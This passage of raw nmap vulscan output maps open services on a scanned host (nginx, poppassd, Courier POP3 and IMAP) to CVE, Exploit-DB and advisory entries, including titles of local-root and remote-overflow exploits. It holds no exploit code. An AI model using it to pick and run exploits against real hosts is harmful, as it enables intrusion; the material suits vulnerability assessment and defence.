7632| [64869] Debian Security Advisory DSA 1884-1 (nginx)
7633|
7634| SecurityTracker - https://www.securitytracker.com:
7635| [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information
7636| [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code
7637| [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code
7638| [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents
7639|
7640| OSVDB - http://www.osvdb.org:
7641| [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access
7642| [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure
7643| [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow
7644| [92796] nginx ngx_http_close_connection Function Crafted r->
7645| [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution
7646| [90518] nginx Log Directory Permission Weakness Local Information Disclosure
7647| [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness
7648| [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access
7649| [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access
7650| [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow
7651| [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure
7652| [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow
7653| [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access
7654| [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS
7655| [65294] nginx on Windows Encoded Space Request Remote Source Disclosure
7656| [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass
7657| [62617] nginx Internal DNS Cache Poisoning Weakness
7658| [61779] nginx HTTP Request Escape Sequence Terminal Command Injection
7659| [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS
7660| [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write
7661| [58128] nginx ngx_http_parse_complex_uri() Function Underflow
7662| [44447] nginx (engine x) msie_refresh Directive Unspecified XSS
7663| [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass
7664| [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass
7665| [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal
7666| [44443] nginx (engine x) rtsig Method Signal Queue Overflow
7667| [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
7668|_
7669106/tcp open pop3pw poppassd
7670| vulscan: VulDB - https://vuldb.com:
7671| No findings
7672|
7673| MITRE CVE - https://cve.mitre.org:
7674| [CVE-2005-3098] poppassd in Qualcomm qpopper 4.0.8 allows local users to modify arbitrary files and gain privileges via the -t (trace file) command line argument.
7675| [CVE-2005-0002] poppassd_pam 1.0 and earlier, when changing a user password, does not verify that the user entered the old password correctly, which allows remote attackers to change passwords for arbitrary users.
7676| [CVE-2002-2024] Horde IMP 2.2.7 allows remote attackers to obtain the full web root pathname via an HTTP request for (1) poppassd.php3, (2) login.php3?reason=chpass2, (3) spelling.php3, and (4) ldap.search.php3?ldap_serv=nonsense which leaks the information in error messages.
7677|
7678| SecurityFocus - https://www.securityfocus.com/bid/:
7679| [7447] Qualcomm Qpopper Poppassd Local Arbitrary Command Execution Vulnerability
7680|
7681| IBM X-Force - https://exchange.xforce.ibmcloud.com:
7682| [18866] poppassd_pam gain access
7683| [11877] Qpopper poppassd root access
7684|
7685| Exploit-DB - https://www.exploit-db.com:
7686| [1230] Qpopper <= 4.0.8 (poppassd) Local Root Exploit (freebsd)
7687| [1229] Qpopper <= 4.0.8 (poppassd) Local Root Exploit (linux)
7688| [21] Qpopper 4.0.x - poppassd Local Root Exploit
7689|
7690| OpenVAS (Nessus) - http://www.openvas.org:
7691| [54808] Gentoo Security Advisory GLSA 200501-22 (poppassd_pam)
7692| [17295] poppassd USER overflow
7693|
7694| SecurityTracker - https://www.securitytracker.com:
7695| [1012840] poppassd_pam Lets Remote Users Modify Arbitrary Passwords
7696| [1006654] Qpopper 'poppassd' Path Specification Feature Lets Local Users Execute Arbitary Code with Root Privileges
7697|
7698| OSVDB - http://www.osvdb.org:
7699| [19683] Qpopper poppassd Trace File Creation Local Privilege Escalation
7700| [12896] POP Password Changer (poppassd_pam) Arbitrary User Remote Password Modification
7701|_
7702110/tcp open pop3 Courier pop3d
7703| vulscan: VulDB - https://vuldb.com:
7704| [100906] Accellion FTA WAF Filter courier/1000@/index.html cross site scripting
7705| [11638] Courier MTA Webmail Server 0.73 External File System denial of service
7706| [50729] e-Courier CMS wizard_oe2.asp Wizard_tracking.asp cross site scripting
7707| [50725] e-Courier CMS cross site scripting
7708| [46287] Pre Courier and Cargo Business unknown vulnerability
7709| [45619] Courier-mta Courtier-authlib up to 0.61.1 authpgsqllib.c sql injection
7710| [36320] Double Precision Incorporated courier-imap up to 4.1.1 Login privilege escalation
7711|
7712| MITRE CVE - https://cve.mitre.org:
7713| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
7714| [CVE-2010-1328] Multiple cross-site scripting (XSS) vulnerabilities in TornadoStore 1.4.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) tipo or (2) destino parameter to login_registrese.php3 in the Services section, (3) the rubro parameter to precios.php3 in the Products section, (4) the arti parameter to recomenda_articulo.php3 in the Products section, (5) the descrip parameter in a profile action to control/abm_det.php3 in the e-Commerce section, (6) the tit parameter in a delivery_courier action to control/abm_list.php3 in the e-Commerce section, or (7) the tit parameter in an usuario action to control/abm_det.php3 in the e-Commerce section.
7715| [CVE-2010-1327] Multiple SQL injection vulnerabilities in TornadoStore 1.4.3 and earlier allow remote attackers to execute arbitrary SQL commands via (1) the marca parameter to precios.php3 or (2) the where parameter in a delivery_courier action to control/abm_list.php3.
7716| [CVE-2009-3905] Multiple cross-site scripting (XSS) vulnerabilities in e-Courier CMS allow remote attackers to inject arbitrary web script or HTML via the UserGUID parameter to (1) Wizard_tracking.asp, (2) wizard_oe2.asp, (3) your-register.asp, (4) main-whyregister.asp, and (5) your.asp in home/, and other unspecified vectors. NOTE: the provenance of this information is unknown
7717| [CVE-2009-3901] Multiple cross-site scripting (XSS) vulnerabilities in e-Courier CMS allow remote attackers to inject arbitrary web script or HTML via the UserGUID parameter to home/index.asp and other unspecified vectors.
7718| [CVE-2008-7012] courier/1000@/api_error_email.html (aka "error reporting page") in Accellion File Transfer Appliance FTA_7_0_178, and possibly other versions before FTA_7_0_189, allows remote attackers to send spam e-mail via modified description and client_email parameters.
7719| [CVE-2008-6984] Plesk 8.6.0, when short mail login names (SHORTNAMES) are enabled, allows remote attackers to bypass authentication and send spam e-mail via a message with (1) a base64-encoded username that begins with a valid shortname, or (2) a username that matches a valid password, as demonstrated using (a) SMTP and qmail, and (b) Courier IMAP and POP3.
7720| [CVE-2008-6054] PreProjects Pre Courier and Cargo Business stores dbcourior.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request.
7721| [CVE-2008-3850] Cross-site scripting (XSS) vulnerability in Accellion File Transfer FTA_7_0_135 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to courier/forgot_password.html.
7722| [CVE-2008-2667] SQL injection vulnerability in the Courier Authentication Library (aka courier-authlib) before 0.60.6 on SUSE openSUSE 10.3 and 11.0, and other platforms, when MySQL and a non-Latin character set are used, allows remote attackers to execute arbitrary SQL commands via the username and unspecified other vectors.
7723| [CVE-2008-2380] SQL injection vulnerability in authpgsqllib.c in Courier-Authlib before 0.62.0, when a non-Latin locale Postgres database is used, allows remote attackers to execute arbitrary SQL commands via query parameters containing apostrophes.
7724| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
7725| [CVE-2006-6390] Multiple directory traversal vulnerabilities in Open Solution Quick.Cart 2.0, when register_globals is enabled and magic_quotes_gpc is disabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the config[db_type] parameter to (1) categories.php, (2) couriers.php, (3) orders.php, and (4) products.php in actions_admin/
7726| [CVE-2006-2659] libs/comverp.c in Courier MTA before 0.53.2 allows attackers to cause a denial of service (CPU consumption) via unknown vectors involving usernames that contain the "=" (equals) character, which is not properly handled during encoding.
7727| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
7728| [CVE-2005-3532] authpam.c in courier-authdaemon for Courier Mail Server 0.37.3 through 0.52.1, when using pam_tally, does not call the pam_acct_mgmt function to verify that access should be granted, which allows attackers to authenticate to the server using accounts that have been disabled.
7729| [CVE-2005-2151] spf.c in Courier Mail Server does not properly handle DNS failures when looking up Sender Policy Framework (SPF) records, which could allow attackers to cause memory corruption.
7730| [CVE-2004-0777] Format string vulnerability in the auth_debug function in Courier-IMAP 1.6.0 through 2.2.1 and 3.x through 3.0.3, when login debugging (DEBUG_LOGIN) is enabled, allows remote attackers to execute arbitrary code.
7731| [CVE-2004-0224] Multiple buffer overflows in (1) iso2022jp.c or (2) shiftjis.c for Courier-IMAP before 3.0.0, Courier before 0.45, and SqWebMail before 4.0.0 may allow remote attackers to execute arbitrary code "when Unicode character is out of BMP range."
7732| [CVE-2003-0040] SQL injection vulnerability in the PostgreSQL auth module for courier 0.40 and earlier allows remote attackers to execute SQL code via the user name.
7733| [CVE-2002-1311] Courier sqwebmail before 0.40.0 does not quickly drop privileges after startup in certain cases, which could allow local users to read arbitrary files.
7734| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
7735| [CVE-2002-0914] Double Precision Courier e-mail MTA allows remote attackers to cause a denial of service (CPU consumption) via a message with an extremely large or negative value for the year, which causes a tight loop.
7736| [CVE-2002-0436] sscd_suncourier.pl CGI script in the Sun Sunsolve CD pack allows remote attackers to execute arbitrary commands via shell metacharacters in the email address parameter.
7737| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
7738| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
7739| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
7740|
7741| SecurityFocus - https://www.securityfocus.com/bid/:
7742| [84605] Pre Courier And Cargo Business CVE-2008-6054 Remote Security Vulnerability
7743| [75469] Courier Mail Server Multiple Memory Corruption Vulnerabilities
7744| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
7745| [41970] e-Courier CMS 'UserGUID' Parameter Multiple Cross Site Scripting Vulnerabilities
7746| [39838] tpop3d Remote Denial of Service Vulnerability
7747| [32926] Courier-Authlib Non-Latin Character Handling Postgres SQL Injection Vulnerability
7748| [29605] Courier-Authlib Non-Latin Character Handling SQL Injection Vulnerability
7749| [23589] Courier-IMAP XMAILDIR Shell Command Injection Vulnerability
7750| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
7751| [18345] Courier Mail Server Username Encoding Remote Denial Of Service Vulnerability
7752| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
7753| [15771] Courier Mail Server Unauthorized Access Vulnerability
7754| [14135] Courier Mail Server Remote Denial Of Service Vulnerability
7755| [10976] Courier-IMAP Remote Format String Vulnerability
7756| [9845] Courier Multiple Remote Buffer Overflow Vulnerabilities
7757| [8495] akpop3d User Name SQL Injection Vulnerability
7758| [8473] Vpop3d Remote Denial Of Service Vulnerability
7759| [6738] Courier-IMAP Username SQL Injection Vulnerability
7760| [6189] Courier SqWebMail File Disclosure Vulnerability
7761| [4908] Courier MTA Long Year Remote Resource Consumption Vulnerability
7762| [4269] Sun Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution Vulnerability
7763| [3990] ZPop3D Bad Login Logging Failure Vulnerability
7764| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
7765|
7766| IBM X-Force - https://exchange.xforce.ibmcloud.com:
7767| [54180] e-Courier CMS multiple scripts cross-site scripting
7768| [54143] e-Courier CMS index.asp cross-site scripting
7769| [47494] Courier Authentication Library Postgres SQL injection
7770| [47436] PRE COURIER &
7771| [43628] Novell OpenSUSE courier-authlib SQL injection
7772| [42950] Courier authentication library username SQL injection
7773| [33805] Gentoo Courier-IMAP command execution
7774| [26998] Courier Mail Server libs/comverp.c usernames denial of service
7775| [26578] Cyrus IMAP pop3d buffer overflow
7776| [23532] Courier Mail Server authentication daemon allows deactivated account access
7777| [21565] Courier Mail Server rfc1035/spf.c denial of service
7778| [17034] Courier-IMAP auth_debug format string attack
7779| [15434] Courier Japanese codeset converter buffer overflow
7780| [13018] akpop3d authentication code SQL injection
7781| [11213] Courier-IMAP authpgsqllib username SQL injection
7782| [10643] Courier sqwebmail mail transport agent (MTA) fails to properly enforce permissions
7783| [9228] Courier MTA long year denial of service
7784| [7345] Slackware Linux imapd and ipop3d core dump
7785| [6269] imap, ipop2d and ipop3d buffer overflows
7786| [5923] Linuxconf vpop3d symbolic link
7787| [4918] IPOP3D, Buffer overflow attack
7788| [1560] IPOP3D, user login successful
7789| [1559] IPOP3D user login to remote host successful
7790| [1525] IPOP3D, user logout
7791| [1524] IPOP3D, user auto-logout
7792| [1523] IPOP3D, user login failure
7793| [1522] IPOP3D, brute force attack
7794| [1521] IPOP3D, user kiss of death logout
7795| [418] pop3d mktemp creates insecure temporary files
7796|
7797| Exploit-DB - https://www.exploit-db.com:
7798| [23053] Vpop3d Remote Denial of Service Vulnerability
7799| [21340] Solaris 7.0/8 Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution Vulnerability
7800| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
7801| [11893] tPop3d 1.5.3 DoS
7802| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
7803| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
7804| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
7805| [432] Courier-IMAP <= 3.0.2-r1 auth_debug() Remote Format String Exploit
7806|
7807| OpenVAS (Nessus) - http://www.openvas.org:
7808| [63556] Gentoo Security Advisory GLSA 200903-25 (courier-authlib)
7809| [63063] Debian Security Advisory DSA 1688-2 (courier-authlib)
7810| [63031] Debian Security Advisory DSA 1688-1 (courier-authlib)
7811| [61600] Gentoo Security Advisory GLSA 200809-05 (courier-authlib)
7812| [61192] FreeBSD Ports: courier-authlib
7813| [58224] Gentoo Security Advisory GLSA 200704-18 (courier-imap)
7814| [57856] Gentoo Security Advisory GLSA 200608-06 (Courier)
7815| [57001] Debian Security Advisory DSA 1101-1 (courier)
7816| [55972] Debian Security Advisory DSA 917-1 (courier)
7817| [55421] Debian Security Advisory DSA 820-1 (courier)
7818| [55204] Debian Security Advisory DSA 793-1 (courier)
7819| [55165] Debian Security Advisory DSA 784-1 (courier)
7820| [54649] Gentoo Security Advisory GLSA 200408-19 (courier-imap)
7821| [54632] Gentoo Security Advisory GLSA 200408-02 (Courier)
7822| [54531] Gentoo Security Advisory GLSA 200403-06 (Courier)
7823| [53589] Debian Security Advisory DSA 247-1 (courier)
7824| [53441] Debian Security Advisory DSA 197-1 (courier)
7825| [53222] Debian Security Advisory DSA 533-1 (courier)
7826| [52431] FreeBSD Ports: courier
7827| [52418] FreeBSD Ports: courier-imap
7828|
7829| SecurityTracker - https://www.securitytracker.com:
7830| [1016248] Courier Mailing List Manager Lets Remote Users Deny Service
7831| [1014798] Courier Mail Server Error in Processing SPF Responses May Let Remote Users Deny Service
7832| [1010982] Courier-IMAP Format String Flaw in auth_debug() Lets Remote Users Execute Arbitrary Code
7833| [1009455] Courier Mail Server 'iso2022jp' and 'shiftjis' Buffer Overflows May Let Remote Users Execute Arbitrary Code
7834| [1006101] Courier Mail Transfer Agent May Let Remote Users Inject and Execute SQL Statements
7835| [1005639] Courier SqWebMail Privilege Dropping Bug Lets Local Users View Files on the System
7836| [1004433] Courier Mail Server Input Validation Bug Lets Remote Users Send Mail Containing Bogus Dates to Cause the Server to Consume Available CPU Resources
7837|
7838| OSVDB - http://www.osvdb.org:
7839| [86050] Courier Authentication Library (courier-authlib) Multiple Unspecified Issues
7840| [63879] Courier MTA localmailfilter Error Message Handling Remote DoS
7841| [59669] e-Courier CMS home/your.asp UserGUID Parameter XSS
7842| [59668] e-Courier CMS home/main-whyregister.asp UserGUID Parameter XSS
7843| [59667] e-Courier CMS home/your-register.asp UserGUID Parameter XSS
7844| [59666] e-Courier CMS home/wizard_oe2.asp UserGUID Parameter XSS
7845| [59665] e-Courier CMS home/Wizard_tracking.asp UserGUID Parameter XSS
7846| [59662] e-Courier CMS home/index.asp UserGUID Parameter XSS
7847| [50872] Pre Courier and Cargo Business dbcourior.mdb Direct Request Database Disclosure
7848| [50811] Courier Authentication Library authpgsqllib.c Unspecified SQL Injection
7849| [48242] Accellion File Transfer Appliance courier/1000@/api_error_email.html Arbitrary Mail Relay
7850| [47516] openSUSE courier-authlib Unspecified SQL Injection
7851| [46049] Courier Authentication Library Username SQL Injection
7852| [35274] Gentoo courier-imap XMAILDIR Variable Remote Command Injection
7853| [31746] Quick.Cart couriers.php config[db_type] Parameter Traversal Local File Inclusion
7854| [26232] Courier Mail Server Crafted Username Encoding DoS
7855| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
7856| [21541] Courier Mail Server courier-authdaemon Deactivated Account Authentication Bypass
7857| [17718] Courier Mail Server DNS SPF Record Lookup Failure Memory Corruption DoS
7858| [14521] Courier sqwebmail Startup Sequence Arbitrary File Access
7859| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
7860| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
7861| [10598] Sun Sunsolve CD Pack sscd_suncourier.pl email Parameter Arbitrary Command Execution
7862| [9506] PostgreSQL Auth Module For Courier User Name Parameter SQL Injection
7863| [9013] Courier-IMAP debug.c auth_debug() Function Remote Format String
7864| [6927] Courier Japanese Codeset shiftjis.c Conversion Overflow
7865| [5857] Linux pop3d Arbitrary Mail File Access
7866| [5052] Double Precision Courier MTA Invalid Year DoS
7867| [4194] Courier Japanese Codeset iso2022jp.c Conversion Overflow
7868| [2471] akpop3d username SQL Injection
7869|_
7870143/tcp open imap Courier Imapd (released 2017)
7871| vulscan: VulDB - https://vuldb.com:
7872| [100906] Accellion FTA WAF Filter courier/1000@/index.html cross site scripting
7873| [11638] Courier MTA Webmail Server 0.73 External File System denial of service
7874| [59792] Cyrus IMAPd 2.4.11 weak authentication
7875| [50729] e-Courier CMS wizard_oe2.asp Wizard_tracking.asp cross site scripting
7876| [50725] e-Courier CMS cross site scripting
7877| [46287] Pre Courier and Cargo Business unknown vulnerability
7878| [45619] Courier-mta Courtier-authlib up to 0.61.1 authpgsqllib.c sql injection
7879| [37927] Ipswitch Ipswitch Collaboration Suite up to 2006.1 IMAP Service imapd32.exe memory corruption
7880| [35759] Atrium MERCUR IMAPD IMAP4 mcrimap4.exe memory corruption
7881| [36320] Double Precision Incorporated courier-imap up to 4.1.1 Login privilege escalation
7882|
7883| MITRE CVE - https://cve.mitre.org:
7884| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
7885| [CVE-2011-3481] The index_get_ids function in index.c in imapd in Cyrus IMAP Server before 2.4.11, when server-side threading is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted References header in an e-mail message.
7886| [CVE-2011-3372] imap/nntpd.c in the NNTP server (nntpd) for Cyrus IMAPd 2.4.x before 2.4.12 allows remote attackers to bypass authentication by sending an AUTHINFO USER command without sending an additional AUTHINFO PASS command.
7887| [CVE-2010-1328] Multiple cross-site scripting (XSS) vulnerabilities in TornadoStore 1.4.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) tipo or (2) destino parameter to login_registrese.php3 in the Services section, (3) the rubro parameter to precios.php3 in the Products section, (4) the arti parameter to recomenda_articulo.php3 in the Products section, (5) the descrip parameter in a profile action to control/abm_det.php3 in the e-Commerce section, (6) the tit parameter in a delivery_courier action to control/abm_list.php3 in the e-Commerce section, or (7) the tit parameter in an usuario action to control/abm_det.php3 in the e-Commerce section.
7888| [CVE-2010-1327] Multiple SQL injection vulnerabilities in TornadoStore 1.4.3 and earlier allow remote attackers to execute arbitrary SQL commands via (1) the marca parameter to precios.php3 or (2) the where parameter in a delivery_courier action to control/abm_list.php3.
7889| [CVE-2009-3905] Multiple cross-site scripting (XSS) vulnerabilities in e-Courier CMS allow remote attackers to inject arbitrary web script or HTML via the UserGUID parameter to (1) Wizard_tracking.asp, (2) wizard_oe2.asp, (3) your-register.asp, (4) main-whyregister.asp, and (5) your.asp in home/, and other unspecified vectors. NOTE: the provenance of this information is unknown
7890| [CVE-2009-3901] Multiple cross-site scripting (XSS) vulnerabilities in e-Courier CMS allow remote attackers to inject arbitrary web script or HTML via the UserGUID parameter to home/index.asp and other unspecified vectors.
7891| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
7892| [CVE-2008-7012] courier/1000@/api_error_email.html (aka "error reporting page") in Accellion File Transfer Appliance FTA_7_0_178, and possibly other versions before FTA_7_0_189, allows remote attackers to send spam e-mail via modified description and client_email parameters.
7893| [CVE-2008-6984] Plesk 8.6.0, when short mail login names (SHORTNAMES) are enabled, allows remote attackers to bypass authentication and send spam e-mail via a message with (1) a base64-encoded username that begins with a valid shortname, or (2) a username that matches a valid password, as demonstrated using (a) SMTP and qmail, and (b) Courier IMAP and POP3.
7894| [CVE-2008-6054] PreProjects Pre Courier and Cargo Business stores dbcourior.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request.
7895| [CVE-2008-3850] Cross-site scripting (XSS) vulnerability in Accellion File Transfer FTA_7_0_135 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to courier/forgot_password.html.
7896| [CVE-2008-2667] SQL injection vulnerability in the Courier Authentication Library (aka courier-authlib) before 0.60.6 on SUSE openSUSE 10.3 and 11.0, and other platforms, when MySQL and a non-Latin character set are used, allows remote attackers to execute arbitrary SQL commands via the username and unspecified other vectors.
7897| [CVE-2008-2380] SQL injection vulnerability in authpgsqllib.c in Courier-Authlib before 0.62.0, when a non-Latin locale Postgres database is used, allows remote attackers to execute arbitrary SQL commands via query parameters containing apostrophes.
7898| [CVE-2007-5740] The format string protection mechanism in IMAPD for Perdition Mail Retrieval Proxy 1.17 and earlier allows remote attackers to execute arbitrary code via an IMAP tag with a null byte followed by a format string specifier, which is not counted by the mechanism.
7899| [CVE-2007-5018] Stack-based buffer overflow in IMAPD in Mercury/32 4.52 allows remote authenticated users to execute arbitrary code via a long argument in a SEARCH ON command. NOTE: this issue might overlap with CVE-2004-1211.
7900| [CVE-2007-3925] Multiple buffer overflows in the IMAP service (imapd32.exe) in Ipswitch IMail Server 2006 before 2006.21 allow remote authenticated users to execute arbitrary code via the (1) Search or (2) Search Charset command.
7901| [CVE-2007-1579] Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.
7902| [CVE-2007-1578] Multiple integer signedness errors in the NTLM implementation in Atrium MERCUR IMAPD (mcrimap4.exe) 5.00.14, with SP4, allow remote attackers to execute arbitrary code via a long NTLMSSP argument that triggers a stack-based buffer overflow.
7903| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
7904| [CVE-2006-6762] The IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to cause a denial of service via an APPEND command with a single "(" (parenthesis) in the argument.
7905| [CVE-2006-6761] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via a long argument to the SUBSCRIBE command.
7906| [CVE-2006-6425] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via unspecified vectors involving the APPEND command.
7907| [CVE-2006-6424] Multiple buffer overflows in Novell NetMail before 3.52e FTF2 allow remote attackers to execute arbitrary code (1) by appending literals to certain IMAP verbs when specifying command continuation requests to IMAPD, resulting in a heap overflow
7908| [CVE-2006-6390] Multiple directory traversal vulnerabilities in Open Solution Quick.Cart 2.0, when register_globals is enabled and magic_quotes_gpc is disabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the config[db_type] parameter to (1) categories.php, (2) couriers.php, (3) orders.php, and (4) products.php in actions_admin/
7909| [CVE-2006-2659] libs/comverp.c in Courier MTA before 0.53.2 allows attackers to cause a denial of service (CPU consumption) via unknown vectors involving usernames that contain the "=" (equals) character, which is not properly handled during encoding.
7910| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
7911| [CVE-2005-3532] authpam.c in courier-authdaemon for Courier Mail Server 0.37.3 through 0.52.1, when using pam_tally, does not call the pam_acct_mgmt function to verify that access should be granted, which allows attackers to authenticate to the server using accounts that have been disabled.
7912| [CVE-2005-2278] Stack-based buffer overflow in the IMAP daemon (imapd) in MailEnable Professional 1.54 allows remote authenticated users to execute arbitrary code via the status command with a long mailbox name.
7913| [CVE-2005-2151] spf.c in Courier Mail Server does not properly handle DNS failures when looking up Sender Policy Framework (SPF) records, which could allow attackers to cause memory corruption.
7914| [CVE-2005-1256] Stack-based buffer overflow in the IMAP daemon (IMAPD32.EXE) in IMail 8.13 in Ipswitch Collaboration Suite (ICS), and other versions before IMail Server 8.2 Hotfix 2, allows remote authenticated users to execute arbitrary code via a STATUS command with a long mailbox name.
7915| [CVE-2005-1249] The IMAP daemon (IMAPD32.EXE) in Ipswitch Collaboration Suite (ICS) allows remote attackers to cause a denial of service (CPU consumption) via an LSUB command with a large number of null characters, which causes an infinite loop.
7916| [CVE-2005-1015] Buffer overflow in MailEnable Imapd (MEIMAP.exe) allows remote attackers to execute arbitrary code via a long LOGIN command.
7917| [CVE-2005-0546] Multiple buffer overflows in Cyrus IMAPd before 2.2.11 may allow attackers to execute arbitrary code via (1) an off-by-one error in the imapd annotate extension, (2) an off-by-one error in "cached header handling," (3) a stack-based buffer overflow in fetchnews, or (4) a stack-based buffer overflow in imapd.
7918| [CVE-2004-0777] Format string vulnerability in the auth_debug function in Courier-IMAP 1.6.0 through 2.2.1 and 3.x through 3.0.3, when login debugging (DEBUG_LOGIN) is enabled, allows remote attackers to execute arbitrary code.
7919| [CVE-2004-0224] Multiple buffer overflows in (1) iso2022jp.c or (2) shiftjis.c for Courier-IMAP before 3.0.0, Courier before 0.45, and SqWebMail before 4.0.0 may allow remote attackers to execute arbitrary code "when Unicode character is out of BMP range."
7920| [CVE-2003-1322] Multiple stack-based buffer overflows in Atrium MERCUR IMAPD in MERCUR Mailserver before 4.2.15.0 allow remote attackers to execute arbitrary code via a long (1) EXAMINE, (2) DELETE, (3) SUBSCRIBE, (4) RENAME, (5) UNSUBSCRIBE, (6) LIST, (7) LSUB, (8) STATUS, (9) LOGIN, (10) CREATE, or (11) SELECT command.
7921| [CVE-2003-0040] SQL injection vulnerability in the PostgreSQL auth module for courier 0.40 and earlier allows remote attackers to execute SQL code via the user name.
7922| [CVE-2002-1782] The default configuration of University of Washington IMAP daemon (wu-imapd), when running on a system that does not allow shell access, allows a local user with a valid IMAP account to read arbitrary files as that user.
7923| [CVE-2002-1604] Multiple buffer overflows in HP Tru64 UNIX allow local and possibly remote attackers to execute arbitrary code via a long NLSPATH environment variable to (1) csh, (2) dtsession, (3) dxsysinfo, (4) imapd, (5) inc, (6) uucp, (7) uux, (8) rdist, or (9) deliver.
7924| [CVE-2002-1311] Courier sqwebmail before 0.40.0 does not quickly drop privileges after startup in certain cases, which could allow local users to read arbitrary files.
7925| [CVE-2002-0997] Buffer overflows in IMAP Agent (imapd) for Novell NetMail (NIMS) 3.0.3 before 3.0.3A allows remote attackers to cause a denial of service.
7926| [CVE-2002-0914] Double Precision Courier e-mail MTA allows remote attackers to cause a denial of service (CPU consumption) via a message with an extremely large or negative value for the year, which causes a tight loop.
